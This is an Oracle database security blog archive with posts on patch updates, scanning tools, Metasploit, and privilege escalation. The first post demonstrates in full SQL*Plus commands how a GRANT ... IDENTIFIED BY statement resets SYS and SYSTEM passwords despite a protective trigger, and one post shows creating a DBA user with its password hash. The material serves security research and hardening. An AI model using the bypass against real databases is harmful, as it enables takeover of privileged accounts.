24 Feb 2010 von Alexander Kornbrust.

I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.

SQL> conn  / as sysdba
Connected.

SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user dbsnmp identified by dbsnmp;
User altered.

Many Oracle users are not aware that the grant command can also be used to change passwords or even create users (”grant dba to user1,user2 identified by user1,user2″). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.

SQL> grant connect to system identified by alex;
Grant succeeded.

To fix this problem we have to block grant commands as well….

Geschrieben in source code audit, Oracle Security | Drucken | 1 Kommentar »

23 Feb 2010 von Alexander Kornbrust.

The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large amount of new features and a complete new GUI (First database scanner with Office-2007 UI).

Here some of the new features of Repscan 3.0:

• Support for MS SQL Server (2000, 2005, 2008)
• Extremely user-friendly database configuration wizard (screenshot)
• Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
• Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
• New reports (performance, used_features, …)
• Data Discovery (SSN, PII, Creditcard, Passwords, …)
• Database Enumeration (custom, NMap support) (screenshot)
• Pentest Features (Guess SID, Check default username/password combinations, …)
• Exploit & Code Library (screenshot)
• Version and Patch Information
• Skins

Here some (old) features of Repscan:

• Password plugin architecture
• Password plugins for Oracle DES, SHA1, OID, APEX, OVS
• Commandline features
• PL/SQL Source Code Analysis Report

Here some statements of Repscan 3.0 users:

“Repscan Rocks”, “I must have this tool.”, “Very cool stuff”, “really like the clean interface… checks are great”, “…tend to be more Oracle security information hub than just scanner :-)”

Over the next  few weeks I will show here more details of some Repscan 3.0 features.

If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo

Geschrieben in software, Tools, source code audit, Security, Oracle Security, Allgemein | Drucken | Keine Kommentare »

15 Feb 2010 von Alexander Kornbrust.

Mike Smithers, a former colleague, maintains a nice blog called “The Anti-Kyte“. He wrote a really interesting article “Self-Inflicted SQL Injection – don’t quote me !” about SQL Injection in Oracle.

Well written Mike.

Geschrieben in SQL Injection, Oracle Security, Allgemein | Drucken | Keine Kommentare »

6 Dez 2009 von Alexander Kornbrust.

Dennis Yurichev wrote an interesting background article about his FPGA password cracker for Oracle, currently the fastest (known) way to brute force Oracle DES passwords.

Dennis mentioned in the article that “By Oracle’s password standard, first password symbol is always Latin character (one of 26)”. This is not exactely correct if you enclose the password in double quotes. In this case all characters are allowed. I tested the FPGA cracker with the following test case and it seems not to crack the hash (currently still running).

SQL> grant dba to x identified by “1″;

USERNAME                       PASSWORD
—————————— ——————————
X                              4D91C057D0C4D801

If you want to try his FPGA cracker here is the link.
Well done and very interesting article Dennis. The only thing I would be interestedis the price of the FPGA hardware.

Geschrieben in Tools, passwords, Oracle Security | Drucken | Keine Kommentare »

17 Nov 2009 von Alexander Kornbrust.

Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:

“Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws. ”

Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features

• Support for the Oracle InstantClient Ruby driver as an exploit mixin
• Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

Geschrieben in Tools, Exploit, Oracle Security, Allgemein | Drucken | Keine Kommentare »

21 Okt 2009 von Alexander Kornbrust.

Today Oracle released the October 2009 CPU.

In total 38 vulnerabilities were fixed with this CPU (or PSU). This CPU will fix 16 new vulnerabilities in the databases. 6 of them remotely exploitable without authentication, 1 affects client-only installations.
The following components are affected.

•  Advanced Queuing
• Application Express
• Authentication
• CORE RDBMS
• Data Mining
• Net Foundation Layer
• Network Authentication
• Oracle Spatial
• Oracle Text
• PL/SQL
• RDBMS Data Pump
• RDBMS Security
• Workspace Manager

As always the usual suspect (Alexander, xxx) reported some of the vulnerabilities.

This time Oracle fixed 2 of ours vulnerabilities. Only 20 Oracle security issues are unfixed…. Oracle is getting better… Time to have a deeper look into 11.2

—-

Report of Critical Patch Update Fixes for Red Database Security

The following issues reported by you are fixed in the upcoming Critical
Patch Update, due to be released at 1pm, U.S. Pacific Time, on October
20, 2009. We ask that any information that you plan to publish
regarding these issues be released after this date and time.

This Critical Patch Update will contain fixes for the following issues:

Reporter: Alexander Kornbrust

9675691  SQL INJECTION IN UPGRADE SCRIPT CATMETX.SQL

10213261  AUDIT CAN BE BYPASSED USING DBMS_SYS_SQL.PARSE_AS_USER

Please let us know if you have any questions or concerns with this
report. Thank you for reporting these issues to Oracle and for your
patience while we investigated and created the fixes.

—-

I will post detailed information including sample code on my blog tomorrow. Especially the dbms_sys_sql bug is critical because it allows to bypass the Oracle Auditing completely (and products using Oracle Auditing like Oracle Audit Vault). Even if this bug is fixed now there are other (similar) bugs around which allow to bypass Oracle Auditing completely.

It took only approx. 2 years to fix the dbms_sys_sql problem.

Geschrieben in CPUOct2009, Oracle Security | Drucken | Keine Kommentare »

20 Okt 2009 von Alexander Kornbrust.

Paul Wright wrote an interesting whitepaper “Create table to OSDBA” about the new preprocessor feature in 11.1.0.7 and higher to run OS commands via tables. This whitepaper shows how to escalate privileges by running operating system commands using create table together with utl_file. In the future Oracle plans to backport the functionality to Oracle 10.2.0.5.

I already talked about the danger of running OS commands via “Create Table” in February 2009 “Trends 2009” (German slides, slide 20) and released in April 2009 a tutorial how to run OS commands via Create table, dbms_scheduler,extproc,plsql native 9, plsql native 10/11, Oracle text and alter systems.Paul added the idea executing files created with utl_file.

Oracle changed the preprocessor handling in Oracle 11.2.0.1.  In 11.2.0.1 it is necessary to have the EXECUTE privileges  on a directory objects (”Execute a preprocessor program that resides in the directory. A preprocessor program converts data to a supported format when loading data records from an external table with the ORACLE_LOADER access driver. Refer to Oracle Database Utilities for more information. This privilege does not implicitly allow READ access on the external table data.”).

Paul wrote a recommendation how to mitigate the preprocessor risk. He recommends to revoke utl_file from public. This is a good idea but keep in mind that there are multiple ways to create (text) files on OS level (e.g. Sample Exploit using dbms_advisor).

I would also recommend to grant read,write instead of granting ALL on directory objects (which includes EXECUTE in 11.2.0.1). And granting to PUBLIC is also always a bad idea. Grant privileges always to a role and/or user only.

Geschrieben in Exploit, Oracle Security | Drucken | 1 Kommentar »

13 Okt 2009 von Alexander Kornbrust.

Just back from a short trip to the Oracle Openworld where I gave a presentation “SQL Injection Crash Course for Developers“. This was the first time I talked at the Openworld in San Francisco. The feedback from the attendees was quite good.

In the SQL Injection presentation I showed some screenshots of the brand new web application scanner Netsparker (previously known as Dilemma) from Mavituna Security.

Netsparker is one of the most advanced web application scanner. Really professional GUI, easy to use. Well done Ferruh

Supports the execution of SQL statements and OS commands on the DB server.

I also met the APEX team from Oracle and had a long interesting chat with them. Joel Kallmann gave me a few tips how to harden my APEX 3.2.1 installation using mod_plsql.

What else happened in the Oracle security scene?

Slavik posted today an interesting blog entry about SQL Injection too.

Today Pete Finnigan published an entry about spoofing users and programs in Oracle. In his blog entry he mentions also the bug DB18 from January 2006, found by Imperva. AFAIK I was the first came up with the idea patching the oraclient9.dll  using a hex editor and then I sent an email with a description to Pete.

Nowadays this trick is no longer necessary for exploiting this after David Litchfield released a small tool (part of OAK - Oracle Assessment Kit) called ora-auth-alter-session.exe. But for many other applications the client patching technique can be really useful.

Geschrieben in Tools, SQL Injection, Oracle Security, Allgemein | Drucken | Keine Kommentare »

1 Okt 2009 von Alexander Kornbrust.

Today the IOUG released a database security study. This study, sponsored by Oracle, revealed some interesting facts.

• 50% increase in data breaches since last year
• Internal threats (e.g. unauthorized users) is a bigger problem than external hackers
• Database adminstration outsourcing increased by 40%
• Nearly 50% of the organization use production data for non-production environments.

You can download the study from the oracle site.

Database security becomes more and more important. People should think about using Oracle security tools (e.g. our database security scanner (Repscan) or innovative security monitoring solutions (Hedgehog)) or to join our 5-day Oracle Anti-Hacker-Training.If you are interested in a (in-house) security training, just us an email.

• 50% increase in data breaches since last year
• Internal threats (e.g. unauthorized users) is a bigger problem than external hackers
• Database adminstration outsourcing increased by 40%
• Nearly 50% of the organization use production data for non-production environments.

You can download the study from the oracle site.

Geschrieben in Oracle Security, Allgemein | Drucken | Keine Kommentare »

1 Sep 2009 von Alexander Kornbrust.

I just saw on OTN that Oracle 11.2.0.1.0 is out.

New possibility for new security bugs

Geschrieben in Oracle Security | Drucken | Keine Kommentare »